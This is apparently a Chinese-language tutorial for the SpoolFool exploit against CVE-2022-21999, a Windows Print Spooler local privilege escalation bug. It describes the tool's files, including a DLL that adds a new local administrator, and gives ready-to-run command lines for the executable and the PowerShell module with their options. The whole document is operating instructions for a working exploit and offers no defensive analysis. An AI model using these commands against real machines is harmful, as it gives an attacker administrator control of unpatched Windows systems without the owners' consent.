SpoolFool 项目使用教程

SpoolFool 项目使用教程

SpoolFoolExploit for CVE-2022-21999 - Windows Print Spooler Elevation of Privilege Vulnerability (LPE)项目地址:https://gitcode.com/gh_mirrors/sp/SpoolFool

1. 项目的目录结构及介绍

SpoolFool 项目的目录结构如下：

SpoolFool/
├── AddUser.dll
├── LICENSE
├── README.md
├── SpoolFool.exe
└── SpoolFool.ps1

• AddUser.dll: 用于创建新本地管理员的 DLL 文件。
• LICENSE: 项目许可证文件，采用 MIT 许可证。
• README.md: 项目说明文件，包含项目的基本信息和使用方法。
• SpoolFool.exe: 项目的可执行文件。
• SpoolFool.ps1: 项目的 PowerShell 脚本文件。

2. 项目的启动文件介绍

SpoolFool.exe

SpoolFool.exe 是项目的主要可执行文件，用于执行漏洞利用。使用方法如下：

C:\SpoolFool\SpoolFool.exe -dll add_user.dll
C:\SpoolFool\SpoolFool.exe -dll add_user.dll -printer 'My Printer'
C:\SpoolFool\SpoolFool.exe -dll add_user.dll -dir 'SECRET'
C:\SpoolFool\SpoolFool.exe -dll add_user.dll -printer 'My Printer' -dir 'SECRET'

SpoolFool.ps1

SpoolFool.ps1 是项目的 PowerShell 脚本文件，用于执行漏洞利用。使用方法如下：

PS C:\SpoolFool> ipmo .\SpoolFool.ps1
PS C:\SpoolFool> Invoke-SpoolFool -dll add_user.dll
PS C:\SpoolFool> Invoke-SpoolFool -dll add_user.dll -printer 'My Printer'
PS C:\SpoolFool> Invoke-SpoolFool -dll add_user.dll -dir 'SECRET'
PS C:\SpoolFool> Invoke-SpoolFool -dll add_user.dll -printer 'My Printer' -dir 'SECRET'

3. 项目的配置文件介绍

SpoolFool 项目没有明确的配置文件，其主要通过命令行参数进行配置。以下是一些常用的命令行参数：

• -dll: 指定要加载的 DLL 文件。
• -printer: 指定要使用的打印机名称。
• -dir: 指定要操作的目录。

通过这些参数，可以灵活地配置和执行漏洞利用。

---

以上是 SpoolFool 项目的基本使用教程，希望对您有所帮助。

SpoolFoolExploit for CVE-2022-21999 - Windows Print Spooler Elevation of Privilege Vulnerability (LPE)项目地址:https://gitcode.com/gh_mirrors/sp/SpoolFool